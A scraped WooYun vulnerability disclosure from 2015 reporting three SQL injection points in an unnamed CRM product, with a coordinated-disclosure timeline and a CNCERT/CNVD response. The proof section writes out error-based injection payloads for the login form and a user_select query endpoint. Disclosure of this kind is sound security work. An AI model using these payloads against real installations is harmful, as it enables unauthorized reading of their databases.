某CRM管理系统通用型SQL注入三枚 | wooyun-2015-0133601| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0133601

漏洞标题：某CRM管理系统通用型SQL注入三枚

漏洞作者：路人甲

提交时间：2015-08-14 17:12

修复时间：2015-11-12 12:44

公开时间：2015-11-12 12:44

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-14：细节已通知厂商并且等待厂商处理中
2015-08-14： cncert国家互联网应急中心暂未能联系到相关单位，细节仅向通报机构公开
2015-08-17：细节向第三方安全合作伙伴开放
2015-10-08：细节向核心白帽子及相关领域专家公开
2015-10-18：细节向普通白帽子公开
2015-10-28：细节向实习白帽子公开
2015-11-12：细节向公众公开

简要描述：

就是这么任性

详细说明：

来看看这个吧：http://**.**.**.**/bugs/wooyun-2010-0122796，其实这个是CRM，不要搞成ERP啦~发现居然是通用。厂商没有标示啊，看看CNCERT怎么做吧~
发现SQL注射3枚：

1、/general/ERP/LOGIN/index.php 登录框存在注入
2、/general/ERP/Enginee/Module/user_select/query.php?TO_ID=TO_ID&TO_NAME=TO_NAME&FORM_NAME=form1&USER_NAME=    USER_NAME参数存在注入
3、/general/ERP/Enginee/Module/user_select/user.php?TO_ID=TO_ID&TO_NAME=TO_NAME&FORM_NAME=form1&USER_PRIV=1&POST_PRIV=&POST_DEPT=&MANAGE_FLAG=&MODULE_ID=   USER_PRIV存在盲注、联合查询

Case: 用户量其实还不小

mask 区域

1.http://**.**.**/general/ERP/LOGIN/index.php_
2.http://**.**.**/general/ERP/LOGIN/index.php_
3.http://**.**.**//general/ERP/LOGIN/index.php_
4.http://**.**.**/general/ERP/LOGIN/index.php_
5.http://**.**.**/general/ERP/LOGIN/index.php_
6.http://**.**.**/general/ERP/LOGIN/_
7.http://**.**.**/general/ERP/LOGIN/_
8.http://**.**.**/app/SunshineCRM/general/ERP/LOGIN/_
9.http://**.**.**/general/ERP/LOGIN/_
*****eral/ERP*****
10.http://**.**.**/general/ERP/LOGIN/_
11.http://**.**.**/general/ERP/LOGIN/_
12.http://**.**.**/general/ERP/LOGIN/_
*****^..*****

漏洞证明：

Security Testing:

第一处：/general/ERP/LOGIN/index.php  



构造语句：username=admin' AND (SELECT 1918 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eITr'='eITr&password=admin&imageField.x=0&imageField.y=0





第二处：/general/ERP/Enginee/Module/user_select/query.php?TO_ID=TO_ID&TO_NAME=TO_NAME&FORM_NAME=form1&USER_NAME=' AND (SELECT 1918 FROM(SELECT COUNT(*),CONCAT((MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eITr'='eITr





第三处：/general/ERP/Enginee/Module/user_select/user.php?TO_ID=TO_ID&TO_NAME=TO_NAME&FORM_NAME=form1&USER_PRIV=1&POST_PRIV=&POST_DEPT=&MANAGE_FLAG=&MODULE_ID=

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2015-08-14 12:42

厂商回复：

CNVD确认所述漏洞情况，暂未建立与软件生产厂商（或网站管理单位）的直接处置渠道，待认领。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0133601

漏洞标题：某CRM管理系统通用型SQL注入三枚

相关厂商：国家互联网应急中心

漏洞作者：路人甲

提交时间：2015-08-14 17:12

修复时间：2015-11-12 12:44

公开时间：2015-11-12 12:44

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0133601

漏洞标题：某CRM管理系统通用型SQL注入三枚

相关厂商：国家互联网应急中心

漏洞作者： 路人甲

提交时间：2015-08-14 17:12

修复时间：2015-11-12 12:44

公开时间：2015-11-12 12:44

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0133601"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云